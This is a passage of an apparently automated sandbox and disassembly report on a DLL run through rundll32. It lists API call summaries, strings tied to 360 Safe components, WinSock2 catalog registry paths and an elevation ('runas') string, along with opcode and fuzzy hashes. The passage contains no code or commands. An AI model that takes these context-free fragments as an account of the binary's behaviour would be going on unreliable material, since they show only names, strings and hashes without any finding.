                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$CriticalDeleteSection
                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
                                                                  • API String ID: 1297904149-2676930693
                                                                  • Opcode ID: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
                                                                  • Instruction ID: 73cc0848a655b1fb88aa06a885314cf1e75da9385d723178a5cf1b8a64167aea
                                                                  • Opcode Fuzzy Hash: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
                                                                  • Instruction Fuzzy Hash: F631F232741B4892EF668F25E4443DC63A0F74ABE0F588621EB5C07BA5CF39D5A9C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleProcess$OpenTokenWindow$DuplicateFindThread
                                                                  • String ID: Progman$Program manager
                                                                  • API String ID: 3967587520-2890643340
                                                                  • Opcode ID: ebbe5ced9ed42ff31fb37c6026852d3e1367768f1ce4ad74df982938cc8d9eb1
                                                                  • Instruction ID: dc0f1755b95b22890c5ec93f314443dee37f8d14911f95f63aa97c4fa7f5c449
                                                                  • Opcode Fuzzy Hash: ebbe5ced9ed42ff31fb37c6026852d3e1367768f1ce4ad74df982938cc8d9eb1
                                                                  • Instruction Fuzzy Hash: 51217F35706B0982EF968B55EC943E563A0FB8C7D4F158125EA5A06BB4DF7CC78C8704
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A907
                                                                  • FindResourceW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A91F
                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A933
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A942
                                                                  • LockResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A953
                                                                  • malloc.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A964
                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A97B
                                                                  • FreeResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A983
                                                                  • FreeLibrary.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A98C
                                                                  • VerQueryValueW.VERSION(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9B4
                                                                  • free.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FreeLibraryLoad$FindLockQuerySizeofValuefreemallocmemmove
                                                                  • String ID:
                                                                  • API String ID: 3317409091-0
                                                                  • Opcode ID: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
                                                                  • Instruction ID: 8185c375a913dccbf35fde3c3455573a2fd048fb7f01b55c3a130ccbeb9ebe14
                                                                  • Opcode Fuzzy Hash: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
                                                                  • Instruction Fuzzy Hash: 09316B35606B4886EA86DF16AC0479AB3E4BB4DFC0F0A8426AE4907764EF3CD649C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FreeLibraryLoad$FindLockQuerySizeofValuefreemallocmemmove
                                                                  • String ID:
                                                                  • API String ID: 3317409091-0
                                                                  • Opcode ID: c78e14dcb0124c7fdfddeb6e32502328b3625422cacc1ce2de84f055e235b1f2
                                                                  • Instruction ID: 7be624b5aba991f8dce8e488531e7c4bc30f0810fde0e2206e2c198a200c07cc
                                                                  • Opcode Fuzzy Hash: c78e14dcb0124c7fdfddeb6e32502328b3625422cacc1ce2de84f055e235b1f2
                                                                  • Instruction Fuzzy Hash: F5316D31702B448AEB87DF6AA84479977E0BB4CFD4F098425AE0907764EF38D64AC700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Valuememset$CloseEnumOpen
                                                                  • String ID: stat
                                                                  • API String ID: 3313869694-548994849
                                                                  • Opcode ID: 021697519deb37d11cec93fa9a5ab951d19f885d93b4615a5ee70ee1a279cb79
                                                                  • Instruction ID: bca1fd9f3236c41ce4b8b5e5b78ce057e793223580287a74ffbbd9e6a5e702b7
                                                                  • Opcode Fuzzy Hash: 021697519deb37d11cec93fa9a5ab951d19f885d93b4615a5ee70ee1a279cb79
                                                                  • Instruction Fuzzy Hash: 4E616076614A8896D7A2CF25E4403DB77A4F7897D4F518216EB9C43BA8DF39C609CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memset$CloseCommandExecuteFileHandleLineModuleNameShell
                                                                  • String ID: /elevated$MPR.dll$runas
                                                                  • API String ID: 3400839104-479190379
                                                                  • Opcode ID: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
                                                                  • Instruction ID: c5738ef19aefcfe0893ce15e6bbb4f81d570db0aa822fd902f1c1618a14612e4
                                                                  • Opcode Fuzzy Hash: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
                                                                  • Instruction Fuzzy Hash: 35518F32611B4481EB919B29D85039A73A5FB88BF4F108316FABE437E4DF38C649C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FromString_wcsupr$HeapProcess
                                                                  • String ID:
                                                                  • API String ID: 2249050647-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: ByteCharCriticalMultiSectionWidehtonlhtons$EnterLeavememmove
                                                                  • String ID:
                                                                  • API String ID: 505489203-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
                                                                  • API String ID: 0-1196714001
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: String$??3@FreeFromHeapProcess_wcsupr_wtoi
                                                                  • String ID: hotkey$internetshortcut
                                                                  • API String ID: 2885337837-1159320594
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CurrentSleepThread
                                                                  • String ID: JudgeVersion
                                                                  • API String ID: 1164918020-3141317846
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: File$AttributesDeleteErrorLast$MutexRelease
                                                                  • String ID: PRAGMA synchronous = OFF;
                                                                  • API String ID: 874664252-1854902270
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: File$Path$Exists$ModuleNameRemoveSpecmemset
                                                                  • String ID: %hd.%hd.%hd.%hd$\360ver.dll$\QHVer.dll
                                                                  • API String ID: 3680197243-1037704697
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ??2@CriticalSection$??3@Deleterand$CountInitializeTickmemsetsrand
                                                                  • String ID: http://%s/dquery
                                                                  • API String ID: 3689213441-2489601265
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: File$Path$CriticalExistsModuleNameSection$AppendCloseControlCreateCurrentDeviceEnterHandleLeaveProcessmemset
                                                                  • String ID: \Config\MessageCenter.db$\deepscan\heavygate64.dll$\heavygate64.dll
                                                                  • API String ID: 830827343-1853890022
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: FreeFromPathTaskmemset$AttributesCombineCreateFileList
                                                                  • String ID: :
                                                                  • API String ID: 2941325240-336475711
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ClassNameTextWindowmemset
                                                                  • String ID: ApplicationFrameWindow$Microsoft Edge
                                                                  • API String ID: 1817102812-2764675319
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc$Delete
                                                                  • String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
                                                                  • API String ID: 2668475584-1053001802
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
Similarity
• API ID: File$View$CloseFindHandleMappingMessageOpenSendTimeoutUnmapWindow
• String ID: Q360GameModeMapping$Q360SafeMonClass
Similarity
• API ID: AddressProc$AppendCriticalPathSection$memset$EnterFileModuleName$??2@CountErrorInitializeLastLeaveSpin
• String ID: ..\deepscan\$speedmem2.hg
Similarity
• API ID: CriticalSectionhtonlhtons$EnterLeavememmove
• String ID:
Similarity
• API ID: InitVariant$ArraySafe$CreateElement
• String ID:
Similarity
• API ID: _wcsicmp
• String ID: %I64u$.exe$InitString$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
Similarity
• API ID: wcschrwcscmpwcsstr$FromHeapProcessString_wcslwr
• String ID: clsid$clsid2
Similarity
• API ID: strchrwcscmpwcsstr$FromHeapProcessString_strlwr
• String ID: clsid$clsid2
Similarity
• API ID: ??3@memmovememset
• String ID: generic$unknown error
Similarity
• API ID: Library$AddressFreeHandleLoadModuleProc
• String ID: AddDllDirectory$kernel32
Similarity
• API ID: CriticalSection$EnterErrorLastLeavememsetstd::_std::exception_ptr::exception_ptr
• String ID: arm64$x64$x86
Similarity
• API ID: AddressCurrentErrorHandleLastModuleProcProcessstd::_std::exception_ptr::exception_ptr
• String ID: IsWow64Process2$Kernel32.dll
Similarity
• API ID: CriticalSection$Leave$AddressEnterFreeInitializeLibraryProc
• String ID: InitLibs
                                                                  • API String ID: 388043826-2748520195
                                                                  • Opcode ID: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
                                                                  • Instruction ID: 14a8bfa7cef1bdae3a626f07b321ff872beb2833b4a3adf2d3b4914cd80619d3
                                                                  • Opcode Fuzzy Hash: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
                                                                  • Instruction Fuzzy Hash: 5631953661874882EBA78F25A4547AE23B0F78DFD4F1A9125ED5A473A4DF38C649CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FileName_wcsicmp$FindModulePathmemset
                                                                  • String ID: 360tray.exe$QHSafeTray.exe
                                                                  • API String ID: 2436975468-72543816
                                                                  • Opcode ID: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
                                                                  • Instruction ID: f13d88eabac643da90db78e2c45270d8f51b6174de2d3bfd56aa28c15744bb18
                                                                  • Opcode Fuzzy Hash: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
                                                                  • Instruction Fuzzy Hash: 86114230615B4882FBA6CB21EC593D62364FB8C7A5F408225E56A867E5EF3DC74DCB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection_time64$EnterLeave
                                                                  • String ID:
                                                                  • API String ID: 3499907473-0
                                                                  • Opcode ID: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
                                                                  • Instruction ID: 2d3d355faa5a201e66dfe59503a55f94d93e9d2144db4385c4ebef4b0973e561
                                                                  • Opcode Fuzzy Hash: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
                                                                  • Instruction Fuzzy Hash: B9517B31605B4889FB968F25E9543D933A5FB0EBE8F548115FD5A27764CF39C689C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _errno
                                                                  • String ID:
                                                                  • API String ID: 2918714741-0
                                                                  • Opcode ID: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
                                                                  • Instruction ID: 8158435372b26aa4a6dd2edb7174a458af360551698bfd787e5366ef90707461
                                                                  • Opcode Fuzzy Hash: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
                                                                  • Instruction Fuzzy Hash: 0441A733604A4886EAA36FA9A4003DD7290BB8C7F4F55C310FA684B7D6CF3DC6598711
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5
                                                                    • Part of subcall function 00000001800562D0: memset.MSVCRT ref: 000000018005630E
                                                                    • Part of subcall function 00000001800562D0: GetModuleFileNameW.KERNEL32 ref: 0000000180056325
                                                                    • Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 0000000180056349
                                                                    • Part of subcall function 00000001800562D0: _wcsicmp.MSVCRT ref: 0000000180056364
                                                                    • Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 000000018005637A
                                                                  • RegCloseKey.ADVAPI32 ref: 0000000180056B49
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AppendPath$CloseFileHeapModuleNameProcess_wcsicmpmemset
                                                                  • String ID: 360EntSecurity$360Safe$?$SOFTWARE\$SOFTWARE\Wow6432Node\
                                                                  • API String ID: 2226481571-3054377637
                                                                  • Opcode ID: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
                                                                  • Instruction ID: 5d79a3dbe08d97a28ec647ffc4188a53122dfd3fad7d09cd3595c12d58dad182
                                                                  • Opcode Fuzzy Hash: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
                                                                  • Instruction Fuzzy Hash: 211261B2701A4886EB419B69C8413DD73A1FB85BF4F448711AA3D977E5DF78CA89C340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString$??2@??3@_wtoi
                                                                  • String ID: //reccfg/wndclass
                                                                  • API String ID: 1119205991-3779619899
                                                                  • Opcode ID: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
                                                                  • Instruction ID: aac1c87dd54dd223690f6a51cef8bcee3ce48f855a47f00273c96f55abf577db
                                                                  • Opcode Fuzzy Hash: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
                                                                  • Instruction Fuzzy Hash: D5B17A32701E489AEB81CF79C4803DC33A0F749B98F058626EA1E57B98DF38CA59C345
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$htonl$htonsmemmove
                                                                  • String ID:
                                                                  • API String ID: 2604728826-0
                                                                  • Opcode ID: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
                                                                  • Instruction ID: c6a7ef21b5906d6b557d77442a06c91d81bd98b5ee7ca8850e16d0b233cac89c
                                                                  • Opcode Fuzzy Hash: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
                                                                  • Instruction Fuzzy Hash: 21B15B36704B848AE792CF61F48039EB7B5F748788F518015EE8917A98CF38D65DDB48
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@?terminate@@$ErrorExceptionLastThrowmemmove
                                                                  • String ID:
                                                                  • API String ID: 223594506-0
                                                                  • Opcode ID: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
                                                                  • Instruction ID: fcc32ee8dbcfcc96106fa9aa2d9edb036d58ed735eb2ced8cd8263455d285739
                                                                  • Opcode Fuzzy Hash: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
                                                                  • Instruction Fuzzy Hash: 0971E472210B8882EB559F19E8403DE6321FB8DBD4F608611FBAD47B96DF38C699C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Value_errno$HeapProcess_time64
                                                                  • String ID: %s_count$%s_lasttime$CloudCfg
                                                                  • API String ID: 2146318826-610660357
                                                                  • Opcode ID: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
